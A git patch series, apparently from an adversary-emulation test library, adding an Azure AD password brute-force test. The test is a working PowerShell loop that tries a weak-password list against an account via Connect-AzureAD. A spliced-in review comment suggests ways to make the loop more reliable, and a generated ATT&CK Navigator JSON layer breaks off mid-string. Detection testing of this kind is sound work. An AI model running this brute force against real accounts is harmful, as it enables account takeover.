From 62943530e9433d27d39ee5329b524138a032c1a0 Mon Sep 17 00:00:00 2001
From: piaconsigny <49986009+piaconsigny@users.noreply.github.com>
Date: Thu, 8 Jul 2021 10:21:08 -0700
Subject: [PATCH 01/19] T1110.001 azureadaccounts (#1482)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* T1110.001 azureadaccounts
* Update T1110.001.yaml
* Apply suggestion
* Remove typo
Co-authored-by: Clément Notin
---
atomics/T1110.001/T1110.001.yaml | 44 ++++++++++++++++++++++++++++++++
1 file changed, 44 insertions(+)
diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml
index 5601e6b1..495befef 100644
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -84,3 +84,47 @@ atomic_tests:
 }
 }
 Write-Host "End of bruteforce"
+- name: Brute Force Credentials of single Azure AD user
+ auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
+ description: |
+ Attempt to brute force Azure AD user via AzureAD powershell module.
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@"
+ type: String
+ default: bruce.wayne@contoso.com
+ passwords:
+ description: List of passwords we will attempt to brute force with
+ type: String
+ default: Password1`n1q2w3e4r`nPassword!
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ AzureAD module must be installed.
+ prereq_command: |
+ if (Get-Module AzureAD) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Import-Module -Name AzureAD
+
+ $passwords = "#{passwords}".split("{`n}")
+ foreach($password in $passwords) {
+ $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ try {
+ Write-Host " [-] Attempting ${password} on account #{username}."
+ Connect-AzureAD -Credential $Credential 2>&1> $null
+ # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+ Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
+ break
+ } catch {
+ Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
+ }
+ }
+ Write-Host "End of bruteforce"
From 6036df88ac385b406c745547d959f2926c336cb5 Mon Sep 17 00:00:00 2001
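Review bot: The prereq check `if (Get-Module AzureAD) {exit 0} else {exit 1}` only sees modules already imported into the current session, so an installed-but-not-imported AzureAD module still fails the check and `Install-Module -Name AzureAD -Force` reruns on every execution; use `if (Get-Module -ListAvailable -Name AzureAD) {exit 0} else {exit 1}` instead. The list split ``.split("{`n}")`` only works because Windows PowerShell coerces the string into a char[] (so `{`, newline and `}` all become separators, and a password containing a brace is cut in two); on PowerShell 7 the string-separator overload is chosen and the whole default list is tried as a single password, so ``$passwords = "#{passwords}" -split "`n"`` is the portable form. Every exception from `Connect-AzureAD` is reported as invalid credentials, but MFA and conditional-access challenges and Azure AD smart lockout also throw, so a locked or MFA-protected account is indistinguishable from a wrong password; consider inspecting the AADSTS code in `$_.Exception.Message` and adding `-ErrorAction Stop` so a non-terminating error cannot fall through to the "valid credentials" message. The description should also warn that repeated failures against a real account will trigger smart lockout, and a successful `Connect-AzureAD` leaves a session open that nothing tears down (a `cleanup_command` running `Disconnect-AzureAD` would cover it).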
From: CircleCI Atomic Red Team GUID generator
Date: Thu, 8 Jul 2021 17:21:50 +0000
Subject: [PATCH 02/19] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
atomics/used_guids.txt | 1 +
1 file changed, 1 insertion(+)
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 4b83c6ba..6a2b05f5 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -728,3 +728,4 @@ b4988cad-6ed2-434d-ace5-ea2670782129
 649349c7-9abf-493b-a7a2-b1aa4d141528
 a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
 c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
+5a51ef57-299e-4d62-8e11-2d440df55e69
From 66bf3375bacf3467e0e3430aa682cbc8a8119159 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 8 Jul 2021 17:21:56 +0000
Subject: [PATCH 03/19] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
.../art-navigator-layer-linux.json | 2 +-
atomics/Indexes/Indexes-CSV/index.csv | 1 +
atomics/Indexes/Indexes-CSV/linux-index.csv | 1 +
atomics/Indexes/Indexes-Markdown/index.md | 1 +
.../Indexes/Indexes-Markdown/linux-index.md | 3 +-
atomics/Indexes/Matrices/linux-matrix.md | 2 +-
atomics/Indexes/index.yaml | 49 ++++++++++++++
atomics/T1110.001/T1110.001.md | 64 +++++++++++++++++++
8 files changed, 120 insertions(+), 3 deletions(-)
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 509eba67..ec2db3f7 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"technique
ID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":tr
ue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://githu
b.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/mast
er/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob
/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-
red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcan
aryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.
md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","sc
